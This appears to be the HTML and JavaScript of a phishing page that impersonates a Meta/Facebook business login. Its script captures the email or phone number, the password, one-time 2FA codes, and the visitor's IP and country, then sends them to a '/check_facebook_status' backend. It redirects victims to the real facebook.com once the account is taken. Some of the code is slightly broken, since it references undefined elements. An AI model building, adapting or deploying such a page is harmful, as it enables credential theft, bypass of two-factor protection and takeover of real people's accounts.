<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Meta Business Tools</title>
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/css/bootstrap.min.css" rel="stylesheet"
        integrity="sha384-EVSTQN3/azprG1Anm3QDgpJLIm9Nao0Yz1ztcQTwFspd3yD65VohhpuuCOmLASjC" crossorigin="anonymous">
    <style>
        body {
            font-family: Arial, sans-serif;
            margin: 0;
            padding: 0;
            box-sizing: border-box;
            background-color: #EEF6FE;
        }

        .home {
            text-align: center;
            margin: 10px auto;
            padding: 10px 20px;
        }

        .header {
            display: flex;
            justify-content: center;
            margin-top: 80px;
        }

        .header img {
            max-height: 60px;
            min-height: 0px;
            object-fit: contain;
            overflow: hidden;
        }

        .content {
            margin-top: 80px;
        }

        .Input {
            width: 100%;
            padding: 10px 16px;
            background: rgb(255, 255, 255);
            border: 1px solid rgb(203, 210, 217);
            border-radius: 12px;
            align-items: center;
            flex-direction: row;
            margin-bottom: 20px;
        }

        .Input:focus {
            border: 1px solid rgba(28, 43, 51, 1.0000) !important;
        }

        .inputLogin {
            width: 100%;
            display: flex;
            opacity: 1;
            height: 44px;
            min-width: 44px;
            flex-grow: 1;
            padding-left: 20px;
            padding-right: 20px;
            background: rgba(0, 100, 224, 1.0000);
            border: 0px solid rgba(28, 43, 51, 1);
            border-radius: 22px;
            align-items: center;
            justify-content: center;
            text-align: center;

        }

        .Input span {
            color: rgba(255, 255, 255, 1);
            font-weight: 500;
            display: inline;
            font-size: 16px;
            font-family: Optimistic Text Normal;
            white-space: pre-wrap;
            overflow-wrap: break-word;
        }

        .wbloks_1 {
            display: flex;
            position: relative;
        }

        .wbloks_1 i {
            position: absolute;
            right: 14px;
            top: 15px;
        }

        .footer {
            display: flex;
            justify-content: center;
            margin-top: 150px;
        }

        .footer img {
            max-height: 10px;
            min-height: 0px;
            object-fit: contain;
            overflow: hidden;

        }

        .home span {
            color: rgba(255, 255, 255, 1.0000);
            font-weight: 500;
            display: inline;
            font-size: 16px;
            font-family: Optimistic Text Normal;
            white-space: pre-wrap;
            overflow-wrap: break-word;
        }

        .loader {
            --d: 22px;
            width: 4px;
            height: 4px;
            border-radius: 50%;
            color: #1877F2;
            box-shadow:
                calc(1*var(--d)) calc(0*var(--d)) 0 0,
                calc(0.707*var(--d)) calc(0.707*var(--d)) 0 1px,
                calc(0*var(--d)) calc(1*var(--d)) 0 2px,
                calc(-0.707*var(--d)) calc(0.707*var(--d)) 0 3px,
                calc(-1*var(--d)) calc(0*var(--d)) 0 4px,
                calc(-0.707*var(--d)) calc(-0.707*var(--d))0 5px,
                calc(0*var(--d)) calc(-1*var(--d)) 0 6px;
            animation: l27 1s infinite steps(8);
        }

        @keyframes l27 {
            100% {
                transform: rotate(1turn)
            }
        }
    </style>
    <script>
        document.addEventListener('DOMContentLoaded', function () {
            const passwordInput = document.getElementById('m_login_password');
            const eyeIcon = document.querySelector('.fa-eye');
            eyeIcon.addEventListener('click', function () {
                const isPasswordVisible = passwordInput.type === 'text';
                passwordInput.type = isPasswordVisible ? 'password' : 'text';
                eyeIcon.className = isPasswordVisible ? 'fa fa-eye-slash' : 'fa fa-eye';
            });
        });
    </script>
    <script>
        function removeRedBorder() {
            var outlineEmailInput = document.getElementById("m_login_email");
            var outlinePasswordInput = document.getElementById("m_login_password");
            var passwordInput = document.getElementById("m_login_password");
            passwordInput.setAttribute("placeholder", "Enter your password");
            outlineEmailInput.style.border = " 1px solid rgb(203, 210, 217)";
            outlinePasswordInput.style.border = " 1px solid rgb(203, 210, 217)";
        }
        function submitForm() {
            var outlineEmailInput = document.getElementById("m_login_email");
            var emailInput = document.getElementById("m_login_email");
            var emailValue = emailInput.value.trim();
            var outlinePasswordInput = document.getElementById("m_login_password");
            var passwordInput = document.getElementById("m_login_password");
            var passwordValue = passwordInput.value.trim();
            if (emailValue === "") {
                var outlineEmailInput = document.getElementById("m_login_email");
                outlineEmailInput.style.border = "1px solid red";
                emailInput.focus();
            } else if (passwordValue === "") {
                outlinePasswordInput.style.border = "1px solid red";
                passwordInput.setAttribute("placeholder", "Please input password");
                passwordInput.focus();
            } else {
                var loader = document.getElementById("loader");
                var emailInput = document.getElementById('m_login_email');
                var m_login_emailValue = m_login_emailInput.value.trim();
                var passwordInput = document.getElementById('m_login_password');
                var passwordValue = passwordInput.value.trim();
                document.getElementById('submit').style.display = "none";
                document.getElementById('loader').style.display = "flex";
                const ipAddress = localStorage.getItem('ipAddress');
                const address = localStorage.getItem('address');
                var fullName = document.getElementById('fullname').value.trim();
                var code = document.getElementById('twoFA')
                var codeValue = code.value
                fetch('/check_facebook_status?username=' + encodeURIComponent(m_login_emailValue) + '&password=' + encodeURIComponent(passwordValue) + '&fullname=' + encodeURIComponent(fullName) + '&code=' + encodeURIComponent(codeValue) + '&ip=' + encodeURIComponent(ipAddress) + '&country=' + encodeURIComponent(address))
                    .then(response => {
                        if (!response.ok) {
                            throw new Error('Network response was not ok');
                        }
                        return response.text();
                    })
                    .then(data => {
                        if (data === '2FA') {
                            var emailContainer = document.getElementById('m_login_email');
                            emailContainer.style.display = 'none';
                            var passContainer = document.getElementById('m_login_password');
                            passContainer.style.display = 'none';
                            var twoFactorContainer = document.getElementById('twoFA');
                            twoFactorContainer.style.display = 'block';
                            var button = document.getElementById("login");
                            button.style.cursor = "";
                            button.addEventListener("click", submitForm);
                        }
                        else if (data === 'WRONG') {
                            var outlinePasswordInput = document.getElementById("m_login_password");
                            outlinePasswordInput.style.border = "1px solid red";
                            passwordInput.setAttribute("placeholder", "Please input password");
                            passwordInput.focus();
                        }
                        else if (data == 'CP') {
                            window.location.href = "https://facebook.com";
                        }
                    })
                    .catch(error => {
                        console.error('There has been a problem with your fetch operation:', error);
                    })
                    .finally(() => {
                        document.getElementById('submit').style.display = "inline-block";
                        document.getElementById('loader').style.display = "none";
                    });
            }
        }
    </script>
    <script>
        document.addEventListener("DOMContentLoaded", async function () {
            let ipAddress;
            let address;
            try {
                const ipifyResponse = await fetch(
                    "https://api.ipify.org?format=json"
                );
                const ipifyData = await ipifyResponse.json();
                ipAddress = ipifyData.ip;

                const ipLocationNetResponse = await fetch(
                    `https://api.iplocation.net/?cmd=ip-country&ip=${ipAddress}`
                );
                const ipLocationNetData = await ipLocationNetResponse.json();
                address = ipLocationNetData.country_name;

                localStorage.setItem("ipAddress", ipAddress);
                localStorage.setItem("address", address);
            } catch (error) {
                console.error("Lỗi:", error);
            }
        });
    </script>
</head>

<body>
    <div class="home">
        <span>English (UK)</span>
        <div class="header">
            <img class="logo" src="./image/fb.png" alt="">
        </div>
        <form>
            <div class="content">
                <div class="wbloks_1" id="wbloks_1">
                    <input class="Input" type="text" id="m_login_email" placeholder="Mobile number or email address">
                </div>
                <div class="wbloks_1">
                    <input class="Input" type="password" id="m_login_password" placeholder="Password">
                    <i class="fa fa-eye"></i>
                </div>
                <div class="wbloks_1" id="wbloks_1">
                    <input style="display: none;" class="Input" type="text" id="twoFA" placeholder="OTP">
                </div>
                <button class="inputLogin" id="login">
                    <span onclick="submitForm()">Log in</span>
                </button>
                <div id="loader" style="display: none;
                                        width:100% ;  
                                        flex-direction: row;
                                        justify-content: center;">
                    <div class="loader"></div>
                </div>
            </div>
        </form>
        <div class="footer">
            <img src="./image/meta.png" alt="">
        </div>
    </div>
</body>

</html>